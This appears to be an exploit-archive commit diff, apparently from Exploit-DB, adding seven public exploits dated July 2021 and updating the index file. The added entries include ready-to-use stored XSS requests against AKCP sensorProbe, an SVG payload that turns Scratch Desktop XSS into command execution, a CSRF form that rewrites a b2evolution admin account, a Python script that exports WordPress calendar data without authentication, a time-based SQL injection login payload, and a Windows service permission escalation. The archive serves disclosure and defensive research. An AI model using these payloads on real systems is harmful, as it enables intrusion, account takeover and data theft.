DB: 2021-07-03
7 changes to exploits/shellcodes WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
This commit is contained in:
Offensive Security
parent
4f3cf46cbf
commit
5bd61e68a2
8 changed files with 530 additions and 0 deletions
67
exploits/hardware/webapps/50080.txt
Normal file
67
exploits/hardware/webapps/50080.txt
Normal file
|
|
@ -0,0 +1,67 @@
|
|||
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
|
||||
# Date: 07-01-2021
|
||||
# Exploit Author: Tyler Butler
|
||||
# Vendor Homepage: https://www.akcp.com/
|
||||
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
|
||||
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
|
||||
# Version: < SP480-20210624
|
||||
# CVE: CVE-2021-35956
|
||||
|
||||
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
|
||||
|
||||
|
||||
1) Stored Cross-Site Scripting via System Settings
|
||||
|
||||
POST /system?time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 114
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/system?time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
|
||||
|
||||
2) Stored Cross-Site Scripting via Email Settings
|
||||
|
||||
POST /mail?time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 162
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/mail?time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
|
||||
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
|
||||
|
||||
3) Stored Cross-Site Scripting via Sensor Description
|
||||
|
||||
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 55
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: CPCookie=sensors=400
|
||||
Connection: close
|
||||
|
||||
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
|
||||
39
exploits/multiple/webapps/50079.txt
Normal file
39
exploits/multiple/webapps/50079.txt
Normal file
|
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
|
||||
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
|
||||
# Date: 2021-06-18
|
||||
# Exploit Author: Stig Magnus Baugstø
|
||||
# Vendor Homepage: https://scratch.mit.edu/
|
||||
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
|
||||
# Version: 3.10.2
|
||||
# Tested on: Windows 10 x64, but should be platform independent.
|
||||
# CVE: CVE-2020-7750
|
||||
|
||||
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
|
||||
|
||||
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
|
||||
|
||||
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
|
||||
</svg>
|
||||
|
||||
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
|
||||
|
||||
Example of regular cross-site scripting (XSS):
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
|
||||
</svg>
|
||||
|
||||
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
|
||||
</svg>
|
||||
|
||||
The example above launches cmd.exe (Command Prompt) on Windows.
|
||||
|
||||
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
|
||||
|
||||
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
|
||||
88
exploits/php/webapps/50081.txt
Normal file
88
exploits/php/webapps/50081.txt
Normal file
|
|
@ -0,0 +1,88 @@
|
|||
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
|
||||
# Exploit Author: Alperen Ergel (@alpernae)
|
||||
# Vendor Homepage: https://b2evolution.net/
|
||||
# Software Link: https://b2evolution.net/downloads/7-2-2
|
||||
# Version : 7.2.2
|
||||
# Tested on: Kali Linux
|
||||
# Category: WebApp
|
||||
|
||||
######## Description ########
|
||||
|
||||
Allows to attacker change admin account details.
|
||||
|
||||
######## Proof of Concept ########
|
||||
|
||||
===> REQUEST <====
|
||||
|
||||
POST /b2evolution/evoadm.php HTTP/1.1
|
||||
Host: s2.demo.opensourcecms.com
|
||||
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
|
||||
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
|
||||
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
|
||||
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1031
|
||||
Origin: https://s2.demo.opensourcecms.com
|
||||
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Te: trailers
|
||||
Connection: close
|
||||
|
||||
## < SNIPP >
|
||||
|
||||
edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
|
||||
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
|
||||
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
|
||||
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
|
||||
|
||||
|
||||
|
||||
|
||||
#### Proof-Of-Concept ####
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
|
||||
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_gender" value="M" />
|
||||
<input type="hidden" name="edited_user_ctry_ID" value="233" />
|
||||
<input type="hidden" name="edited_user_rgn_ID" value="" />
|
||||
<input type="hidden" name="edited_user_subrg_ID" value="" />
|
||||
<input type="hidden" name="edited_user_city_ID" value="" />
|
||||
<input type="hidden" name="edited_user_age_min" value="" />
|
||||
<input type="hidden" name="edited_user_age_max" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_month" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_day" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_year" value="" />
|
||||
<input type="hidden" name="organizations[]" value="1" />
|
||||
<input type="hidden" name="org_roles[]" value="King of Spades" />
|
||||
<input type="hidden" name="org_priorities[]" value="" />
|
||||
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
|
||||
<input type="hidden" name="uf_new[2][]" value="" />
|
||||
<input type="hidden" name="uf_new[3][]" value="" />
|
||||
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
|
||||
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
|
||||
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
|
||||
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
|
||||
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
|
||||
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
|
||||
<input type="hidden" name="new_field_type" value="0" />
|
||||
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
|
||||
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
|
||||
<input type="hidden" name="ctrl" value="user" />
|
||||
<input type="hidden" name="user_tab" value="profile" />
|
||||
<input type="hidden" name="identity_form" value="1" />
|
||||
<input type="hidden" name="user_ID" value="1" />
|
||||
<input type="hidden" name="orig_user_ID" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
122
exploits/php/webapps/50082.py
Executable file
122
exploits/php/webapps/50082.py
Executable file
File diff suppressed because one or more lines are too long
69
exploits/php/webapps/50084.py
Executable file
69
exploits/php/webapps/50084.py
Executable file
|
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
|
||||
# Date 01.07.2021
|
||||
# Exploit Author: Ron Jost (Hacker5preme)
|
||||
# Vendor Homepage: https://webnus.net/modern-events-calendar/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
|
||||
# Version: Before 5.16.5
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2021-24146
|
||||
# CWE: CWE-863, CWE-284
|
||||
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
|
||||
|
||||
'''
|
||||
Description:
|
||||
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
|
||||
versions before 5.16.5, did not properly restrict access to the export files,
|
||||
allowing unauthenticated users to exports all events data in CSV or XML format for example.
|
||||
'''
|
||||
|
||||
|
||||
'''
|
||||
Banner:
|
||||
'''
|
||||
banner = """
|
||||
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
|
||||
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
|
||||
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
|
||||
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
|
||||
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
|
||||
|
||||
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
|
||||
* @Hacker5preme
|
||||
|
||||
"""
|
||||
print(banner)
|
||||
|
||||
|
||||
'''
|
||||
Import required modules:
|
||||
'''
|
||||
import requests
|
||||
import argparse
|
||||
import csv
|
||||
|
||||
'''
|
||||
User-Input:
|
||||
'''
|
||||
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
|
||||
my_parser.add_argument('-T', '--IP', type=str)
|
||||
my_parser.add_argument('-P', '--PORT', type=str)
|
||||
my_parser.add_argument('-U', '--PATH', type=str)
|
||||
args = my_parser.parse_args()
|
||||
target_ip = args.IP
|
||||
target_port = args.PORT
|
||||
wp_path = args.PATH
|
||||
|
||||
|
||||
'''
|
||||
Exploit:
|
||||
'''
|
||||
print('')
|
||||
print('[+] Exported Data: ')
|
||||
print('')
|
||||
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
|
||||
answer = requests.get(exploit_url)
|
||||
decoded_content = answer.content.decode('utf-8')
|
||||
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
|
||||
my_list = list(cr)
|
||||
for row in my_list:
|
||||
print(row)
|
||||
48
exploits/php/webapps/50085.txt
Normal file
48
exploits/php/webapps/50085.txt
Normal file
|
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
|
||||
# Exploit Author: ircashem
|
||||
# Date 02.07.2021
|
||||
# Vendor Homepage: https://www.sourcecodester.com/
|
||||
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
|
||||
# Version 1.0
|
||||
# Tested on: Ubuntu 20.04
|
||||
|
||||
####################
|
||||
# Proof of Concept #
|
||||
####################
|
||||
|
||||
POST /login.php HTTP/1.1
|
||||
Content-Length: 456
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
|
||||
Origin: http://localhost
|
||||
DNT: 1
|
||||
Referer: http://localhost/
|
||||
Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-GPC: 1
|
||||
Connection: close
|
||||
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="username"
|
||||
|
||||
admin
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
-----------------------------238993435340593308934076060075--
|
||||
|
||||
###########
|
||||
# Payload #
|
||||
###########
|
||||
|
||||
username=admin
|
||||
password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
||||
90
exploits/windows/local/50083.txt
Normal file
90
exploits/windows/local/50083.txt
Normal file
|
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
|
||||
# Date: 2021-07-01
|
||||
# Author: Andrea Intilangelo
|
||||
# Vendor Homepage: http://nica.it - http://winwastenet.com
|
||||
# Version: 1.0.6183.16475
|
||||
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
|
||||
|
||||
WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
|
||||
|
||||
(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
|
||||
(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.
|
||||
|
||||
(3) Details:
|
||||
|
||||
C:\Users\user>sc qc winwasteservice
|
||||
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
|
||||
|
||||
NOME_SERVIZIO: winwasteservice
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_AVVIO : 2 AUTO_START
|
||||
CONTROLLO_ERRORE : 1 NORMAL
|
||||
NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
GRUPPO_ORDINE_CARICAMENTO :
|
||||
TAG : 0
|
||||
NOME_VISUALIZZATO : WinwasteService
|
||||
DIPENDENZE :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||
|
||||
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||
|
||||
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||
|
||||
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
|
||||
NT SERVICE\TrustedInstaller:(I)(F)
|
||||
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||
|
||||
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||
|
||||
|
||||
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
|
||||
NT SERVICE\TrustedInstaller:(ID)F
|
||||
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
||||
CREATOR OWNER:(OI)(CI)(IO)(ID)F
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
|
@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port
|
|||
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
|
||||
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
|
||||
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
|
||||
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port
|
|||
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
|
||||
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
|
||||
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
|
||||
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,
|
||||
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware,
|
||||
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php,
|
||||
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||
50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue